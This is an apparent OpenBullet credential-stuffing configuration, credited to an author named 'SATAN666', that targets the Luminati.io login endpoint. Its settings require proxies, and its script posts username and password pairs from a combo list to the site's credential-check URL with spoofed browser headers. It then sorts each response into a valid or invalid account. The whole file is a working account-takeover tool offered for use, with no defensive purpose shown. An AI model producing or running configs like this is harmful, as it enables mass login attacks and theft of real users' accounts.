[SETTINGS]
{
  "Name": "Luminati.io",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-06-08T13:01:17.2871189+05:30",
  "AdditionalInfo": "",
  "Author": "SATAN666",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://luminati.io/users/auth/basic/check_credentials" ParseQuery=TRUE 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 46" 
  HEADER "Accept: text/plain, */*; q=0.01" 
  HEADER "Origin: https://luminati.io" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Referer: https://luminati.io/" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "ok" 
  KEYCHAIN Failure OR 
    KEY "not_registered" 
    KEY "unauthorized" 

